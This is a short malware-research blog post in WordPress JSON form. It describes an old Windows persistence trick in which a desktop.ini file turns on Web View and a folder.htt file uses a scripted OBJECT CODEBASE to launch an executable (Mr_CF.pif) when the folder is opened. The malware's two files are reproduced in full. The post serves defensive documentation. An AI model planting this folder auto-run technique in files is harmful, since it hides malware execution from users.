{"id":3919,"date":"2016-11-05T01:13:56","date_gmt":"2016-11-05T01:13:56","guid":{"rendered":"http:\/\/www.hexacorn.com\/blog\/?p=3919"},"modified":"2016-11-05T01:15:49","modified_gmt":"2016-11-05T01:15:49","slug":"beyond-good-ol-run-key-part-49","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2016\/11\/05\/beyond-good-ol-run-key-part-49\/","title":{"rendered":"Beyond good ol\u2019 Run key, Part 49"},"content":{"rendered":"<p>I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival &#8211; it used the <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/aa969337.aspx\">desktop.ini<\/a> \/ <a href=\"https:\/\/support.microsoft.com\/en-us\/kb\/181689\">folder.htt<\/a> combo that comes to play when the <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/bb776835(v=vs.85).aspx\">Web View<\/a> is chosen for folders (XP or earlier). I know, I know.. it&#8217;s archaeology&#8230; but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now&#8230;<\/p>\n<p>An example Desktop.ini created by the malware looks like this:<\/p>\n<pre>[.ShellClassInfo]\r\nConfirmFileOp=0\r\n[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]\r\nPersistMoniker=file:\/\/Folder.htt\r\n[ExtShellFolderViews]\r\n{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}<\/pre>\n<p>and the associated folder.htt like this:<\/p>\n<pre>&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;meta http-equiv=\"content-type\"content=\"text\/html; charset=Windows-1252\"&gt;\r\n&lt;\/head&gt;\r\n&lt;body style=\"margin: 0\" scroll=no&gt;\r\n&lt;object id=FileList border=0 tabindex=1\r\nclassid= \"clsid:1820FED0-473E-11D0-A96C-00C04FD705A2\"\r\nstyle=\"width: 100; height: 100\" tabIndex=-1&gt;\r\n&lt;\/object&gt;\r\n&lt;\/body&gt;\r\n&lt;\/html&gt;\r\n&lt;script&gt;\r\nobjectstr=\"&lt;OBJECT ID=\\\"RUNIT\\\" WIDTH=0 HEIGHT=0 TYPE=\\\"application\/x-oleobject\\\"\"\r\nobjectstr+=\"CODEBASE=\\\"Mr_CF.pif#version=1,1,1,1\\\"&gt;\"\r\nobjectstr+=\"&lt;PARAM NAME=\\\"_Version\\\" VALUE=\\\"65536\\\"&gt;\"\r\nobjectstr+=\"&lt;\/OBJECT&gt;\"\r\nobjectstr+=\"&lt;HTML&gt;&lt;H1&gt;&lt;\/H1&gt;&lt;\/HTML&gt;\";\r\ndocument.writeln(objectstr);\r\ndocument.close();\r\n&lt;\/script&gt;<\/pre>\n<p>There is not much more I can write here&#8230; this is super old-school and I am just adding it for completeness.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival &#8211; it used the desktop.ini \/ folder.htt combo that comes &hellip; <a href=\"https:\/\/www.hexacorn.com\/blog\/2016\/11\/05\/beyond-good-ol-run-key-part-49\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[35,15,19,46,9],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/3919"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=3919"}],"version-history":[{"count":4,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/3919\/revisions"}],"predecessor-version":[{"id":3923,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/3919\/revisions\/3923"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=3919"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=3919"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=3919"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}